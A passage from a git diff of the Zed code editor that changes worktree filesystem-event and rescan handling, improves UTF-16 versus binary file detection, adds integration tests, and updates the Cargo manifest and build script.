(ix, event) in events.iter().enumerate() { + let abs_path = SanitizedPath::new(&event.path); let mut is_git_related = false; let mut dot_git_paths = None; @@ -4070,13 +4221,33 @@ impl BackgroundScanner { } if let Some((dot_git_abs_path, path_in_git_dir)) = dot_git_paths { - if skipped_files_in_dot_git + // We ignore `""` as well, as that is going to be the + // `.git` folder itself. WE do not care about it, if + // there are changes within we will see them, we need + // this ignore to prevent us from accidentally observing + // the ignored created file due to the events not being + // empty after filtering. + + let is_dot_git_changed = { + path_in_git_dir == Path::new("") + && event.kind == Some(PathEventKind::Changed) + && abs_path + .strip_prefix(root_canonical_path) + .ok() + .and_then(|it| RelPath::new(it, PathStyle::local()).ok()) + .is_some_and(|it| { + snapshot + .entry_for_path(&it) + .is_some_and(|entry| entry.kind == EntryKind::Dir) + }) + }; + let condition = skipped_files_in_dot_git.iter().any(|skipped| { + OsStr::new(skipped) == path_in_git_dir.as_path().as_os_str() + }) || skipped_dirs_in_dot_git .iter() - .any(|skipped| OsStr::new(skipped) == path_in_git_dir.as_path().as_os_str()) - || skipped_dirs_in_dot_git.iter().any(|skipped_git_subdir| { - path_in_git_dir.starts_with(skipped_git_subdir) - }) - { + .any(|skipped_git_subdir| path_in_git_dir.starts_with(skipped_git_subdir)) + || is_dot_git_changed; + if condition { log::debug!( "ignoring event {abs_path:?} as it's in the .git directory among skipped files or directories" ); @@ -4153,11 +4324,14 @@ impl BackgroundScanner { continue; } - relative_paths.push(relative_path.into_arc()); + relative_paths.push(EventRoot { + path: relative_path.into_arc(), + was_rescanned: matches!(event.kind, Some(fs::PathEventKind::Rescan)), + }); } for range_to_drop in ranges_to_drop.into_iter().rev() { - abs_paths.drain(range_to_drop); + events.drain(range_to_drop); } } @@ -4181,12 +4355,24 @@ impl BackgroundScanner { self.state.lock().await.snapshot.scan_id += 1; let (scan_job_tx, scan_job_rx) = channel::unbounded(); - log::debug!("received fs events {:?}", relative_paths); + log::debug!( + "received fs events {:?}", + relative_paths + .iter() + .map(|event_root| &event_root.path) + .collect::>() + ); self.reload_entries_for_paths( &root_path, &root_canonical_path, - &relative_paths, - abs_paths, + &relative_paths + .iter() + .map(|event_root| event_root.path.clone()) + .collect::>(), + events + .into_iter() + .map(|event| event.path) + .collect::>(), Some(scan_job_tx.clone()), ) .await; @@ -4214,7 +4400,8 @@ impl BackgroundScanner { state.scanned_dirs.remove(&entry.id); } } - self.send_status_update(false, SmallVec::new()).await; + self.send_status_update(false, SmallVec::new(), &relative_paths) + .await; } async fn update_global_gitignore(&self, abs_path: &Path) { @@ -4240,7 +4427,7 @@ impl BackgroundScanner { ) .await; self.scan_dirs(false, scan_job_rx).await; - self.send_status_update(false, SmallVec::new()).await; + self.send_status_update(false, SmallVec::new(), &[]).await; } async fn forcibly_load_paths(&self, paths: &[Arc]) -> bool { @@ -4321,7 +4508,8 @@ impl BackgroundScanner { ) { Ok(_) => { last_progress_update_count += 1; - self.send_status_update(true, SmallVec::new()).await; + self.send_status_update(true, SmallVec::new(), &[]) + .await; } Err(count) => { last_progress_update_count = count; @@ -4350,19 +4538,22 @@ impl BackgroundScanner { &self, scanning: bool, barrier: SmallVec<[barrier::Sender; 1]>, + event_roots: &[EventRoot], ) -> bool { let mut state = self.state.lock().await; - if state.changed_paths.is_empty() && scanning { + if state.changed_paths.is_empty() && event_roots.is_empty() && scanning { return true; } + let merged_event_roots = merge_event_roots(&state.changed_paths, event_roots); + let new_snapshot = state.snapshot.clone(); let old_snapshot = mem::replace(&mut state.prev_snapshot, new_snapshot.snapshot.clone()); let changes = build_diff( self.phase, &old_snapshot, &new_snapshot, - &state.changed_paths, + &merged_event_roots, ); state.changed_paths.clear(); @@ -4461,7 +4652,10 @@ impl BackgroundScanner { if self.settings.is_path_excluded(&child_path) { log::debug!("skipping excluded child entry {child_path:?}"); - self.state.lock().await.remove_path(&child_path); + self.state + .lock() + .await + .remove_path(&child_path, self.watcher.as_ref()); continue; } @@ -4651,7 +4845,7 @@ impl BackgroundScanner { // detected regardless of the order of the paths. for (path, metadata) in relative_paths.iter().zip(metadata.iter()) { if matches!(metadata, Ok(None)) || doing_recursive_update { - state.remove_path(path); + state.remove_path(path, self.watcher.as_ref()); } } @@ -5213,11 +5407,40 @@ async fn discover_ancestor_git_repo( (ignores, exclude, None) } +fn merge_event_roots(changed_paths: &[Arc], event_roots: &[EventRoot]) -> Vec { + let mut merged_event_roots = Vec::with_capacity(changed_paths.len() + event_roots.len()); + let mut changed_paths = changed_paths.iter().peekable(); + let mut event_roots = event_roots.iter().peekable(); + while let (Some(path), Some(event_root)) = (changed_paths.peek(), event_roots.peek()) { + match path.cmp(&&event_root.path) { + Ordering::Less => { + merged_event_roots.push(EventRoot { + path: (*changed_paths.next().expect("peeked changed path")).clone(), + was_rescanned: false, + }); + } + Ordering::Equal => { + merged_event_roots.push((*event_roots.next().expect("peeked event root")).clone()); + changed_paths.next(); + } + Ordering::Greater => { + merged_event_roots.push((*event_roots.next().expect("peeked event root")).clone()); + } + } + } + merged_event_roots.extend(changed_paths.map(|path| EventRoot { + path: path.clone(), + was_rescanned: false, + })); + merged_event_roots.extend(event_roots.cloned()); + merged_event_roots +} + fn build_diff( phase: BackgroundScannerPhase, old_snapshot: &Snapshot, new_snapshot: &Snapshot, - event_paths: &[Arc], + event_roots: &[EventRoot], ) -> UpdatedEntriesSet { use BackgroundScannerPhase::*; use PathChange::{Added, AddedOrUpdated, Loaded, Removed, Updated}; @@ -5225,13 +5448,14 @@ fn build_diff( // Identify which paths have changed. Use the known set of changed // parent paths to optimize the search. let mut changes = Vec::new(); + let mut old_paths = old_snapshot.entries_by_path.cursor::(()); let mut new_paths = new_snapshot.entries_by_path.cursor::(()); let mut last_newly_loaded_dir_path = None; old_paths.next(); new_paths.next(); - for path in event_paths { - let path = PathKey(path.clone()); + for event_root in event_roots { + let path = PathKey(event_root.path.clone()); if old_paths.item().is_some_and(|e| e.path < path.0) { old_paths.seek_forward(&path, Bias::Left); } @@ -5277,6 +5501,8 @@ fn build_diff( } else { changes.push((new_entry.path.clone(), new_entry.id, Updated)); } + } else if event_root.was_rescanned { + changes.push((new_entry.path.clone(), new_entry.id, Updated)); } old_paths.next(); new_paths.next(); @@ -5883,6 +6109,16 @@ fn parse_gitfile(content: &str) -> anyhow::Result<&Path> { Ok(Path::new(path.trim())) } +async fn discover_root_repo_common_dir(root_abs_path: &Path, fs: &dyn Fs) -> Option> { + let root_dot_git = root_abs_path.join(DOT_GIT); + if !fs.metadata(&root_dot_git).await.is_ok_and(|m| m.is_some()) { + return None; + } + let dot_git_path: Arc = root_dot_git.into(); + let (_, common_dir) = discover_git_paths(&dot_git_path, fs).await; + Some(common_dir) +} + async fn discover_git_paths(dot_git_abs_path: &Arc, fs: &dyn Fs) -> (Arc, Arc) { let mut repository_dir_abs_path = dot_git_abs_path.clone(); let mut common_dir_abs_path = dot_git_abs_path.clone(); @@ -6043,7 +6279,7 @@ fn decode_byte_full( } } -#[derive(PartialEq)] +#[derive(Debug, PartialEq)] enum ByteContent { Utf16Le, Utf16Be, @@ -6099,13 +6335,24 @@ fn analyze_byte_content(bytes: &[u8]) -> ByteContent { return ByteContent::Unknown; } - if total_null_count >= limit / 16 { - if even_null_count > odd_null_count * 4 { + let has_significant_nulls = total_null_count >= limit / 16; + let nulls_skew_to_even = even_null_count > odd_null_count * 4; + let nulls_skew_to_odd = odd_null_count > even_null_count * 4; + + if has_significant_nulls { + let sample = &bytes[..limit]; + + // UTF-16BE ASCII: [0x00, char] — nulls at even positions (high byte first) + // UTF-16LE ASCII: [char, 0x00] — nulls at odd positions (low byte first) + + if nulls_skew_to_even && is_plausible_utf16_text(sample, false) { return ByteContent::Utf16Be; } - if odd_null_count > even_null_count * 4 { + + if nulls_skew_to_odd && is_plausible_utf16_text(sample, true) { return ByteContent::Utf16Le; } + return ByteContent::Binary; } @@ -6127,4 +6374,208 @@ fn is_known_binary_header(bytes: &[u8]) -> bool { || bytes.starts_with(b"GIF89a") // GIF89a || bytes.starts_with(b"IWAD") // Doom IWAD archive || bytes.starts_with(b"PWAD") // Doom PWAD archive + || bytes.starts_with(b"RIFF") // WAV, AVI, WebP + || bytes.starts_with(b"OggS") // OGG (Vorbis, Opus, FLAC) + || bytes.starts_with(b"fLaC") // FLAC + || bytes.starts_with(b"ID3") // MP3 with ID3v2 tag + || bytes.starts_with(b"\xFF\xFB") // MP3 frame sync (MPEG1 Layer3) + || bytes.starts_with(b"\xFF\xFA") // MP3 frame sync (MPEG1 Layer3) + || bytes.starts_with(b"\xFF\xF3") // MP3 frame sync (MPEG2 Layer3) + || bytes.starts_with(b"\xFF\xF2") // MP3 frame sync (MPEG2 Layer3) +} + +// Null byte skew alone is not enough to identify UTF-16 -- binary formats with +// small 16-bit values (like PCM audio) produce the same pattern. Decode the +// bytes as UTF-16 and reject if too many code units land in control character +// ranges or form unpaired surrogates, which real text almost never contains. +fn is_plausible_utf16_text(bytes: &[u8], little_endian: bool) -> bool { + let mut suspicious_count = 0usize; + let mut total = 0usize; + + let mut i = 0; + while let Some(code_unit) = read_u16(bytes, i, little_endian) { + total += 1; + + match code_unit { + 0x0009 | 0x000A | 0x000C | 0x000D => {} + // C0/C1 control characters and non-characters + 0x0000..=0x001F | 0x007F..=0x009F | 0xFFFE | 0xFFFF => suspicious_count += 1, + 0xD800..=0xDBFF => { + let next_offset = i + 2; + let has_low_surrogate = read_u16(bytes, next_offset, little_endian) + .is_some_and(|next| (0xDC00..=0xDFFF).contains(&next)); + if has_low_surrogate { + total += 1; + i += 2; + } else { + suspicious_count += 1; + } + } + // Lone low surrogate without a preceding high surrogate + 0xDC00..=0xDFFF => suspicious_count += 1, + _ => {} + } + + i += 2; + } + + if total == 0 { + return false; + } + + // Real UTF-16 text has near-zero control characters; binary data with + // small 16-bit values typically exceeds 5%. 2% provides a safe margin. + suspicious_count * 100 < total * 2 +} + +fn read_u16(bytes: &[u8], offset: usize, little_endian: bool) -> Option { + let pair = [*bytes.get(offset)?, *bytes.get(offset + 1)?]; + if little_endian { + return Some(u16::from_le_bytes(pair)); + } + Some(u16::from_be_bytes(pair)) +} + +#[cfg(test)] +mod tests { + use super::*; + + /// reproduction of issue #50785 + fn build_pcm16_wav_bytes() -> Vec { + let header: Vec = vec![ + /* RIFF header */ + 0x52, 0x49, 0x46, 0x46, // "RIFF" + 0xc6, 0xcf, 0x00, 0x00, // file size: 8 + 0x57, 0x41, 0x56, 0x45, // "WAVE" + /* fmt chunk */ + 0x66, 0x6d, 0x74, 0x20, // "fmt " + 0x10, 0x00, 0x00, 0x00, // chunk size: 16 + 0x01, 0x00, // format: PCM (1) + 0x01, 0x00, // channels: 1 (mono) + 0x80, 0x3e, 0x00, 0x00, // sample rate: 16000 + 0x00, 0x7d, 0x00, 0x00, // byte rate: 32000 + 0x02, 0x00, // block align: 2 + 0x10, 0x00, // bits per sample: 16 + /* LIST chunk */ + 0x4c, 0x49, 0x53, 0x54, // "LIST" + 0x1a, 0x00, 0x00, 0x00, // chunk size: 26 + 0x49, 0x4e, 0x46, 0x4f, // "INFO" + 0x49, 0x53, 0x46, 0x54, // "ISFT" + 0x0d, 0x00, 0x00, 0x00, // sub-chunk size: 13 + 0x4c, 0x61, 0x76, 0x66, 0x36, 0x32, 0x2e, 0x33, // "Lavf62.3" + 0x2e, 0x31, 0x30, 0x30, 0x00, // ".100\0" + /* padding byte for word alignment */ + 0x00, // data chunk header + 0x64, 0x61, 0x74, 0x61, // "data" + 0x80, 0xcf, 0x00, 0x00, // chunk size + ]; + + let mut bytes = header; + + // fill remaining space up to `FILE_ANALYSIS_BYTES` with synthetic PCM + let audio_bytes_needed = FILE_ANALYSIS_BYTES - bytes.len(); + for i in 0..(audio_bytes_needed / 2) { + let sample = (i & 0xFF) as u8; + bytes.push(sample); // low byte: varies + bytes.push(0x00); // high byte: zero for small values + } + + bytes + } + + #[test] + fn test_pcm16_wav_detected_as_binary() { + let wav_bytes = build_pcm16_wav_bytes(); + assert_eq!(wav_bytes.len(), FILE_ANALYSIS_BYTES); + + let result = analyze_byte_content(&wav_bytes); + assert_eq!( + result, + ByteContent::Binary, + "PCM 16-bit WAV should be detected as Binary via RIFF header" + ); + } + + #[test] + fn test_le16_binary_not_misdetected_as_utf16le() { + let mut bytes = b"FAKE".to_vec(); + while bytes.len() < FILE_ANALYSIS_BYTES { + let sample = (bytes.len() & 0xFF) as u8; + bytes.push(sample); + bytes.push(0x00); + } + bytes.truncate(FILE_ANALYSIS_BYTES); + + let result = analyze_byte_content(&bytes); + assert_eq!( + result, + ByteContent::Binary, + "LE 16-bit binary with control characters should be detected as Binary" + ); + } + + #[test] + fn test_be16_binary_not_misdetected_as_utf16be() { + let mut bytes = b"FAKE".to_vec(); + while bytes.len() < FILE_ANALYSIS_BYTES { + bytes.push(0x00); + let sample = (bytes.len() & 0xFF) as u8; + bytes.push(sample); + } + bytes.truncate(FILE_ANALYSIS_BYTES); + + let result = analyze_byte_content(&bytes); + assert_eq!( + result, + ByteContent::Binary, + "BE 16-bit binary with control characters should be detected as Binary" + ); + } + + #[test] + fn test_utf16le_text_detected_as_utf16le() { + let text = "Hello, world! This is a UTF-16 test string. "; + let mut bytes = Vec::new(); + while bytes.len() < FILE_ANALYSIS_BYTES { + bytes.extend(text.encode_utf16().flat_map(|u| u.to_le_bytes())); + } + bytes.truncate(FILE_ANALYSIS_BYTES); + + assert_eq!(analyze_byte_content(&bytes), ByteContent::Utf16Le); + } + + #[test] + fn test_utf16be_text_detected_as_utf16be() { + let text = "Hello, world! This is a UTF-16 test string. "; + let mut bytes = Vec::new(); + while bytes.len() < FILE_ANALYSIS_BYTES { + bytes.extend(text.encode_utf16().flat_map(|u| u.to_be_bytes())); + } + bytes.truncate(FILE_ANALYSIS_BYTES); + + assert_eq!(analyze_byte_content(&bytes), ByteContent::Utf16Be); + } + + #[test] + fn test_known_binary_headers() { + let cases: &[(&[u8], &str)] = &[ + (b"RIFF\x00\x00\x00\x00WAVE", "WAV"), + (b"RIFF\x00\x00\x00\x00AVI ", "AVI"), + (b"OggS\x00\x02", "OGG"), + (b"fLaC\x00\x00", "FLAC"), + (b"ID3\x03\x00", "MP3 ID3v2"), + (b"\xFF\xFB\x90\x00", "MP3 MPEG1 Layer3"), + (b"\xFF\xF3\x90\x00", "MP3 MPEG2 Layer3"), + ]; + + for (header, label) in cases { + let mut bytes = header.to_vec(); + bytes.resize(FILE_ANALYSIS_BYTES, 0x41); // pad with 'A' + assert_eq!( + analyze_byte_content(&bytes), + ByteContent::Binary, + "{label} should be detected as Binary" + ); + } + } } diff --git a/crates/worktree/tests/integration/main.rs b/crates/worktree/tests/integration/main.rs index 803a7e4e6c893e29466e3e6002b3efbdc5574859..b8d1994b1dc3f8ddbd482dd0863e3441ab7adc64 100644 --- a/crates/worktree/tests/integration/main.rs +++ b/crates/worktree/tests/integration/main.rs @@ -14,10 +14,12 @@ use worktree::{Entry, EntryKind, Event, PathChange, Worktree, WorktreeModelHandl use serde_json::json; use settings::{SettingsStore, WorktreeId}; use std::{ + cell::Cell, env, fmt::Write, mem, path::{Path, PathBuf}, + rc::Rc, sync::Arc, }; use util::{ @@ -409,6 +411,164 @@ async fn test_renaming_case_only(cx: &mut TestAppContext) { }); } +#[gpui::test] +async fn test_root_rescan_reconciles_stale_state(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + "/root", + json!({ + "old.txt": "", + }), + ) + .await; + + let tree = Worktree::local( + Path::new("/root"), + true, + fs.clone(), + Default::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + + cx.read(|cx| tree.read(cx).as_local().unwrap().scan_complete()) + .await; + + tree.read_with(cx, |tree, _| { + assert_eq!( + tree.entries(true, 0) + .map(|entry| entry.path.as_ref()) + .collect::>(), + vec![rel_path(""), rel_path("old.txt")] + ); + }); + + fs.pause_events(); + fs.remove_file(Path::new("/root/old.txt"), RemoveOptions::default()) + .await + .unwrap(); + fs.insert_file(Path::new("/root/new.txt"), Vec::new()).await; + assert_eq!(fs.buffered_event_count(), 2); + fs.clear_buffered_events(); + + tree.read_with(cx, |tree, _| { + assert!(tree.entry_for_path(rel_path("old.txt")).is_some()); + assert!(tree.entry_for_path(rel_path("new.txt")).is_none()); + }); + + fs.emit_fs_event("/root", Some(fs::PathEventKind::Rescan)); + fs.unpause_events_and_flush(); + tree.flush_fs_events(cx).await; + + tree.read_with(cx, |tree, _| { + assert!(tree.entry_for_path(rel_path("old.txt")).is_none()); + assert!(tree.entry_for_path(rel_path("new.txt")).is_some()); + assert_eq!( + tree.entries(true, 0) + .map(|entry| entry.path.as_ref()) + .collect::>(), + vec![rel_path(""), rel_path("new.txt")] + ); + }); +} + +#[gpui::test] +async fn test_subtree_rescan_reports_unchanged_descendants_as_updated(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + "/root", + json!({ + "dir": { + "child.txt": "", + "nested": { + "grandchild.txt": "", + }, + "remove": { + "removed.txt": "", + } + }, + "other.txt": "", + }), + ) + .await; + + let tree = Worktree::local( + Path::new("/root"), + true, + fs.clone(), + Default::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + + cx.read(|cx| tree.read(cx).as_local().unwrap().scan_complete()) + .await; + + let tree_updates = Arc::new(Mutex::new(Vec::new())); + tree.update(cx, |_, cx| { + let tree_updates = tree_updates.clone(); + cx.subscribe(&tree, move |_, _, event, _| { + if let Event::UpdatedEntries(update) = event { + tree_updates.lock().extend( + update + .iter() + .filter(|(path, _, _)| path.as_ref() != rel_path("fs-event-sentinel")) + .map(|(path, _, change)| (path.clone(), *change)), + ); + } + }) + .detach(); + }); + fs.pause_events(); + fs.insert_file("/root/dir/new.txt", b"new content".to_vec()) + .await; + fs.remove_dir( + "/root/dir/remove".as_ref(), + RemoveOptions { + recursive: true, + ignore_if_not_exists: false, + }, + ) + .await + .unwrap(); + fs.clear_buffered_events(); + fs.unpause_events_and_flush(); + + fs.emit_fs_event("/root/dir", Some(fs::PathEventKind::Rescan)); + tree.flush_fs_events(cx).await; + + assert_eq!( + mem::take(&mut *tree_updates.lock()), + &[ + (rel_path("dir").into(), PathChange::Updated), + (rel_path("dir/child.txt").into(), PathChange::Updated), + (rel_path("dir/nested").into(), PathChange::Updated), + ( + rel_path("dir/nested/grandchild.txt").into(), + PathChange::Updated + ), + (rel_path("dir/new.txt").into(), PathChange::Added), + (rel_path("dir/remove").into(), PathChange::Removed), + ( + rel_path("dir/remove/removed.txt").into(), + PathChange::Removed + ), + ] + ); + + tree.read_with(cx, |tree, _| { + assert!(tree.entry_for_path(rel_path("other.txt")).is_some()); + }); +} + #[gpui::test] async fn test_open_gitignored_files(cx: &mut TestAppContext) { init_test(cx); @@ -2576,6 +2736,97 @@ fn check_worktree_entries( } } +#[gpui::test] +async fn test_root_repo_common_dir(executor: BackgroundExecutor, cx: &mut TestAppContext) { + init_test(cx); + + use git::repository::Worktree as GitWorktree; + + let fs = FakeFs::new(executor); + + // Set up a main repo and a linked worktree pointing back to it. + fs.insert_tree( + path!("/main_repo"), + json!({ + ".git": {}, + "file.txt": "content", + }), + ) + .await; + fs.add_linked_worktree_for_repo( + Path::new(path!("/main_repo/.git")), + false, + GitWorktree { + path: PathBuf::from(path!("/linked_worktree")), + ref_name: Some("refs/heads/feature".into()), + sha: "abc123".into(), + is_main: false, + }, + ) + .await; + fs.write( + path!("/linked_worktree/file.txt").as_ref(), + "content".as_bytes(), + ) + .await + .unwrap(); + + let tree = Worktree::local( + path!("/linked_worktree").as_ref(), + true, + fs.clone(), + Arc::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + tree.update(cx, |tree, _| tree.as_local().unwrap().scan_complete()) + .await; + cx.run_until_parked(); + + // For a linked worktree, root_repo_common_dir should point to the + // main repo's .git, not the worktree-specific git directory. + tree.read_with(cx, |tree, _| { + assert_eq!( + tree.snapshot().root_repo_common_dir().map(|p| p.as_ref()), + Some(Path::new(path!("/main_repo/.git"))), + ); + }); + + let event_count: Rc> = Rc::new(Cell::new(0)); + tree.update(cx, { + let event_count = event_count.clone(); + |_, cx| { + cx.subscribe(&cx.entity(), move |_, _, event, _| { + if matches!(event, Event::UpdatedRootRepoCommonDir) { + event_count.set(event_count.get() + 1); + } + }) + .detach(); + } + }); + + // Remove .git — root_repo_common_dir should become None. + fs.remove_file( + &PathBuf::from(path!("/linked_worktree/.git")), + Default::default(), + ) + .await + .unwrap(); + tree.flush_fs_events(cx).await; + + tree.read_with(cx, |tree, _| { + assert_eq!(tree.snapshot().root_repo_common_dir(), None); + }); + assert_eq!( + event_count.get(), + 1, + "should have emitted UpdatedRootRepoCommonDir on removal" + ); +} + fn init_test(cx: &mut gpui::TestAppContext) { zlog::init_test(); @@ -2947,3 +3198,67 @@ async fn test_refresh_entries_for_paths_creates_ancestors(cx: &mut TestAppContex ); }); } + +#[gpui::test] +async fn test_single_file_worktree_deleted(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + + fs.insert_tree( + "/root", + json!({ + "test.txt": "content", + }), + ) + .await; + + let tree = Worktree::local( + Path::new("/root/test.txt"), + true, + fs.clone(), + Default::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + + cx.read(|cx| tree.read(cx).as_local().unwrap().scan_complete()) + .await; + + tree.read_with(cx, |tree, _| { + assert!(tree.is_single_file(), "Should be a single-file worktree"); + assert_eq!(tree.abs_path().as_ref(), Path::new("/root/test.txt")); + }); + + // Delete the file + fs.remove_file(Path::new("/root/test.txt"), Default::default()) + .await + .unwrap(); + + // Subscribe to worktree events + let deleted_event_received = Rc::new(Cell::new(false)); + let _subscription = cx.update({ + let deleted_event_received = deleted_event_received.clone(); + |cx| { + cx.subscribe(&tree, move |_, event, _| { + if matches!(event, Event::Deleted) { + deleted_event_received.set(true); + } + }) + } + }); + + // Trigger filesystem events - the scanner should detect the file is gone immediately + // and emit a Deleted event + cx.background_executor.run_until_parked(); + cx.background_executor + .advance_clock(std::time::Duration::from_secs(1)); + cx.background_executor.run_until_parked(); + + assert!( + deleted_event_received.get(), + "Should receive Deleted event when single-file worktree root is deleted" + ); +} diff --git a/crates/x_ai/src/x_ai.rs b/crates/x_ai/src/x_ai.rs index 072a893a6a8f4fc7fbc8a6f4f5ed43316915b974..1abb2b53771fa1e29e2979560e9f394744b26158 100644 --- a/crates/x_ai/src/x_ai.rs +++ b/crates/x_ai/src/x_ai.rs @@ -165,6 +165,18 @@ impl Model { } } + pub fn requires_json_schema_subset(&self) -> bool { + match self { + Self::Grok4 + | Self::Grok4FastReasoning + | Self::Grok4FastNonReasoning + | Self::Grok41FastNonReasoning + | Self::Grok41FastReasoning + | Self::GrokCodeFast1 => true, + _ => false, + } + } + pub fn supports_prompt_cache_key(&self) -> bool { false } diff --git a/crates/zed/Cargo.toml b/crates/zed/Cargo.toml index 82b730ee8f1b50f6f46a7400be908a9442e115d1..9feaa59c9762208e4e4e85748f21a7a3e0afc3db 100644 --- a/crates/zed/Cargo.toml +++ b/crates/zed/Cargo.toml @@ -2,7 +2,7 @@ description = "The fast, collaborative code editor." edition.workspace = true name = "zed" -version = "0.227.0" +version = "0.232.0" publish.workspace = true license = "GPL-3.0-or-later" authors = ["Zed Team "] @@ -13,11 +13,12 @@ workspace = true [features] tracy = ["ztracing/tracy"] +# LEAK_BACKTRACE=1 cargo run --features zed/track-project-leak --profile release-fast +track-project-leak = ["gpui/leak-detection"] test-support = [ "gpui/test-support", "gpui_platform/screen-capture", "dep:image", - "dep:semver", "workspace/test-support", "project/test-support", "editor/test-support", @@ -32,7 +33,6 @@ visual-tests = [ "gpui_platform/screen-capture", "gpui_platform/test-support", "dep:image", - "dep:semver", "dep:tempfile", "dep:action_log", "dep:agent_servers", @@ -50,7 +50,6 @@ visual-tests = [ "language_model/test-support", "fs/test-support", "recent_projects/test-support", - "sidebar/test-support", "title_bar/test-support", ] @@ -69,14 +68,13 @@ activity_indicator.workspace = true agent.workspace = true agent-client-protocol.workspace = true agent_settings.workspace = true -agent_ui.workspace = true +agent_ui = { workspace = true, features = ["audio"] } anyhow.workspace = true askpass.workspace = true assets.workspace = true audio.workspace = true auto_update.workspace = true auto_update_ui.workspace = true -bincode.workspace = true breadcrumbs.workspace = true call.workspace = true chrono.workspace = true @@ -94,6 +92,7 @@ copilot.workspace = true copilot_chat.workspace = true copilot_ui.workspace = true crashes.workspace = true +csv_preview.workspace = true dap_adapters.workspace = true db.workspace = true debug_adapter_extension.workspace = true @@ -121,7 +120,7 @@ system_specs.workspace = true gpui.workspace = true gpui_platform = {workspace = true, features=["screen-capture", "font-kit", "wayland", "x11"]} image = { workspace = true, optional = true } -semver = { workspace = true, optional = true } +semver.workspace = true tempfile = { workspace = true, optional = true } clock = { workspace = true, optional = true } acp_thread.workspace = true @@ -189,7 +188,6 @@ sidebar.workspace = true smol.workspace = true snippet_provider.workspace = true snippets_ui.workspace = true -supermaven.workspace = true svg_preview.workspace = true sysinfo.workspace = true tab_switcher.workspace = true @@ -199,6 +197,7 @@ telemetry.workspace = true telemetry_events.workspace = true terminal_view.workspace = true theme.workspace = true +theme_settings.workspace = true theme_extension.workspace = true theme_selector.workspace = true time.workspace = true @@ -242,9 +241,11 @@ gpui = { workspace = true, features = [ ] } ashpd.workspace = true +[target.'cfg(target_os = "linux")'.build-dependencies] +pkg-config = "0.3.22" + [dev-dependencies] call = { workspace = true, features = ["test-support"] } -dap = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } image_viewer = { workspace = true, features = ["test-support"] } @@ -254,8 +255,6 @@ pretty_assertions.workspace = true project = { workspace = true, features = ["test-support"] } semver.workspace = true terminal_view = { workspace = true, features = ["test-support"] } -tree-sitter-md.workspace = true -tree-sitter-rust.workspace = true title_bar = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } image.workspace = true diff --git a/crates/zed/build.rs b/crates/zed/build.rs index 7e22752d35d9115efd735bfc7b2690f4bf5680d3..4b27d939aee833058d03771907b53324a6ce50d0 100644 --- a/crates/zed/build.rs +++ b/crates/zed/build.rs @@ -2,6 +2,27 @@ use std::process::Command; fn main() { + #[cfg(target_os = "linux")] + { + // Add rpaths for libraries that webrtc-sys dlopens at runtime. + // This is mostly required for hosts with non-standard SO installation + // locations such as NixOS. + let dlopened_libs = ["libva", "libva-drm", "egl"]; + + let mut rpath_dirs = std::collections::BTreeSet::new(); + for lib in &dlopened_libs { + if let Some(libdir) = pkg_config::get_variable(lib, "libdir").ok() { + rpath_dirs.insert(libdir); + } else { + eprintln!("zed build.rs: {lib} not found in pkg-config's path"); + } + } + + for dir in &rpath_dirs { + println!("cargo:rustc-link-arg=-Wl,-rpath,{dir}"); + } + } + if cfg!(target_os = "macos") { println!("cargo:rustc-env=MACOSX_DEPLOYMENT_TARGET=10.15.7"); @@ -24,12 +45,28 @@ fn main() { "cargo:rustc-env=TARGET={}", std::env::var("TARGET").unwrap() ); - if let Ok(output) = Command::new("git").args(["rev-parse", "HEAD"]).output() - && output.status.success() - { - let git_sha = String::from_utf8_lossy(&output.stdout); - let git_sha = git_sha.trim(); + let git_sha = match std::env::var("ZED_COMMIT_SHA").ok() { + Some(git_sha) => { + // In deterministic build environments such as Nix, we inject the commit sha into the build script. + Some(git_sha) + } + None => { + if let Some(output) = Command::new("git") + .args(["rev-parse", "HEAD"]) + .output() + .ok() + && output.status.success() + { + let git_sha = String::from_utf8_lossy(&output.stdout); + Some(git_sha.trim().to_string()) + } else { + None + } + } + }; + + if let Some(git_sha) = git_sha { println!("cargo:rustc-env=ZED_COMMIT_SHA={git_sha}"); if let Some(build_identifier) = option_env!("GITHUB_RUN_NUMBER") { @@ -45,10 +82,8 @@ fn main() { } } - #[cfg(target_os = "windows")] - { - #[cfg(target_env = "msvc")] - { + if cfg!(windows) { + if cfg!(target_env = "msvc") { // todo(windows): This is to avoid stack overflow. Remove it when solved. println!("cargo:rustc-link-arg=/stack:{}", 8 * 1024 * 1024); } @@ -65,7 +100,7 @@ fn main() { let conpty_dll_target = target_dir.join("conpty.dll"); let open_console_target = target_dir.join("OpenConsole.exe"); - let conpty_url = "https://github.com/microsoft/terminal/releases/download/v1.23.13503.0/Microsoft.Windows.Console.ConPTY.1.23.251216003.nupkg"; + let conpty_url = "https://github.com/microsoft/terminal/releases/download/v1.24.10621.0/Microsoft.Windows.Console.ConPTY.1.24.260303001.nupkg"; let nupkg_path = out_dir.join("conpty.nupkg.zip"); let extract_dir = out_dir.join("conpty"); @@ -180,21 +215,24 @@ fn main() { println!("cargo:rerun-if-env-changed=RELEASE_CHANNEL"); println!("cargo:rerun-if-changed={}", icon.display()); - let mut res = winresource::WindowsResource::new(); + #[cfg(windows)] + { + let mut res = winresource::WindowsResource::new(); - // Depending on the security applied to the computer, winresource might fail - // fetching the RC path. Therefore, we add a way to explicitly specify the - // toolkit path, allowing winresource to use a valid RC path. - if let Some(explicit_rc_toolkit_path) = std::env::var("ZED_RC_TOOLKIT_PATH").ok() { - res.set_toolkit_path(explicit_rc_toolkit_path.as_str()); - } - res.set_icon(icon.to_str().unwrap()); - res.set("FileDescription", "Zed"); - res.set("ProductName", "Zed"); + // Depending on the security applied to the computer, winresource might fail + // fetching the RC path. Therefore, we add a way to explicitly specify the + // toolkit path, allowing winresource to use a valid RC path. + if let Some(explicit_rc_toolkit_path) = std::env::var("ZED_RC_TOOLKIT_PATH").ok() { + 